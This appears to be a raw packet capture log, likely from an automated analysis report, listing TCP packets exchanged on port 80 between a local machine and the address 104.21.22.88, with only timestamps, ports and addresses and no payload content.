Dec 27, 2024 06:22:14.673521996 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.674523115 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.674573898 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.674658060 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.675666094 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.675719976 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.675777912 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.676789045 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.676846027 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.676898003 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.677915096 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.677973032 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.678020000 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.679038048 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.679089069 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.679140091 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.680186987 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.680277109 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.680278063 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.681325912 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.681380987 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.681401014 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.682427883 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.682482958 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.682522058 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.683541059 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.683614969 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.683732986 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.684675932 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.684729099 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.684747934 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.685827017 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.685872078 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.685923100 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.686928988 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.686975956 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.687016010 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.688055038 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.688111067 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.688177109 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.689177990 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.689229012 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.689307928 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.690301895 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.690355062 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.690421104 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.691446066 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.691502094 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.691540956 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.736465931 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.846252918 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.846338034 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.846477032 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.846513987 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.846625090 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.846676111 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.847486973 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.847702980 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.847760916 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.848489046 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.848655939 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.848721981 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.849225998 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.849427938 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.849497080 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.850186110 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.850306034 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.850362062 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.851236105 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.851388931 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.851443052 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.852200031 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.852279902 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.852335930 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.853179932 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.853297949 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.853346109 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.854182959 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.854291916 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.854346991 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.855166912 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.855298042 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.855360031 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.856175900 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.856311083 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.856360912 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.857155085 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.857284069 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.857383966 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.858175993 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.858272076 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.858329058 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.859143019 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.859289885 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.859338999 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.860200882 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.860269070 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.860318899 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.861146927 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.861268044 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.861323118 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.862153053 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.862313986 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.862366915 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.863137007 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.863264084 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.863328934 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.864135027 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.864269972 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.864320993 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.865137100 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.865289927 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.865345001 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.866137981 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.866270065 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.866323948 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.867121935 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.867249966 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.867307901 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.868109941 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.868264914 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.868356943 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.869108915 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.869266033 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.869322062 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.870119095 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.870234966 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.870286942 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.871140003 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.871192932 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.871260881 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.872118950 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.872232914 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.872286081 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.873234987 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.873343945 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.873397112 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.874097109 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.874216080 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.874269962 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.875082016 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.875211000 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.875258923 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.876094103 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.876214981 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.876270056 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.877101898 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.877208948 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.877262115 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.878082991 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.878197908 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.878248930 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.879100084 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.879185915 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.879280090 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.880067110 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.880209923 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.880263090 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.881066084 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.881211996 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.881268024 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.882102013 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.882153988 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.882209063 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.883054018 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.883208036 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.883260012 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.884073019 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.884226084 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.884284019 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.885078907 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.885212898 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.885262966 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.886044025 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.886189938 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.886240005 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.887041092 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.887120008 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.887177944 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.888053894 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.888185978 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.888233900 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.889049053 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.889163971 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.889218092 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.890044928 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.890168905 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.890233040 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.890321970 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.891041994 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.891097069 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.891161919 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.892039061 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.892164946 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.892232895 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.893013000 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.893146038 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.893208981 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.894088030 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.894153118 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.894202948 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.895030022 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.895142078 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.895204067 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.896024942 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.896146059 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.896193981 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.897007942 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.897133112 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.897207975 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.898010969 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.898123980 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.898176908 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.047753096 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.047909975 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.047971010 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.048166990 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.048293114 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.048356056 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.049191952 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.049299002 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.049364090 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.050168991 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.050312042 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.050368071 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.051194906 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.051248074 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.051300049 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.052155018 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.052272081 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.052320957 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.053150892 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.053261995 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.053313971 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.054136992 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.054266930 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.054321051 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.055154085 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.055279970 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.055358887 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.056143045 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.056338072 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.056386948 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.057120085 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.057292938 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.057343960 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.058195114 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.058304071 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.058357954 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.059151888 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.059245110 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.059303999 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.060132980 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.060250998 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.060302019 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.061126947 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.061304092 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.061362982 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.062118053 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.062362909 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.062419891 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.063107967 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.063251972 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.063309908 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.064094067 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.064228058 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.064282894 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.065119982 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.065155983 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.065201998 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.066112041 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.066235065 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.066284895 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.067091942 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.067307949 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.067353010 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.068134069 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.068275928 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.068340063 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.069111109 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.069228888 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.069295883 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.070089102 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.070220947 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.070287943 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.071079969 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.071209908 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.071271896 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.072103977 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.072227955 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.072297096 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.077074051 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.077164888 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.077200890 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.077229977 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.077331066 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.077364922 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.077385902 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.077416897 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.077452898 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.077461004 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.077584982 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.077619076 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.077651978 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.077653885 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.077699900 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.078054905 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.078207970 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.078265905 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.079073906 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.079183102 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.079238892 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.080063105 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.080182076 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.080235958 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.081043005 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.081190109 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.081248999 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.082051992 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.082190990 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.082257032 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.083043098 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.083168983 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.083220959 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.084028006 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.084165096 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.084228039 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.085028887 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.085155964 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.085218906 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.086030006 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.086144924 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.086201906 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.087034941 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.087136030 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.087198019 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.088028908 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.088160992 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.088223934 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.089025021 CET	80	49730	104.21.22.88	192.168.2.4
